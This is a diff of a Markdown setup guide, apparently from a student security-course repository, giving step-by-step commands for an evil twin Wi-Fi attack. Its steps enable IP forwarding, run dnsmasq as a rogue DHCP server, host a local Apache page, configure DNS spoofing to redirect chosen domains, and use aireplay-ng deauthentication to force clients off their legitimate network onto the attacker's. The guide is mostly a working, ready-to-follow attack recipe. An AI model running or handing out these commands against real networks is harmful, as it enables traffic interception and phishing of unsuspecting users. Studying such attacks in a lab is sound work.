JulianKeller/cs425-backdoor/eviltwin/EvilTwin_Setup.md

 	`sudo update-alternatives --config iptables`
 	Select the `/usr/sbin/iptables-legacy 10 manual mode` option

-12. enable port forwarding: `echo 1 > /proc/sys/net/ipv4/ip_forward`
+12. enable port forwarding
+	`echo 1 > /proc/sys/net/ipv4/ip_forward`

-13. evil twin is now setup, now need to allocate ip addresses to clients `dnsmasq -C /root/Desktop/dnsmasq.conf -d` Congratulations, you have setup hotspot for yourself.
+13. evil twin is now setup, now need to allocate ip addresses to clients
+	`dnsmasq -C /root/Desktop/dnsmasq.conf -d`
+	Congratulations, you have setup hotspot for yourself.

 14. Now we can start a local Apache webserver that we can redirect traffic to.
 	Place a webpage under `/var/www/html/index.html`.
 Ours is named index.html.
 	Start the server: `sudo /etc/init.d/apache2 start`

 15. Your apache server is running locally.
-Record the IP address `hostname -I` will give you your devices ip address.
+Record the IP address
+	`hostname -I` will give you your devices ip address.
 Additionally you can use localhost which is `127.0.0.1`

 15. Now we can do some dns spoofing.
 	Create a file `config/dnsspoof.conf`
 	Add urls you want to spoof to it.
 For example this will redirect anyone trying to visit http://www.example.com to our local apache server.
 	`127.0.0.1	example.com`
 	Note that the ip address and url must be separated by a tab, not spaces.
 	You can add as many lines like this as you like for redirecting traffic.

 16. Now deauthorize clients so they connect to our network instead of their legit network.
 	`aireplay-ng –deauth 0 -a <BSSID> wlan1mon`

 # Caveats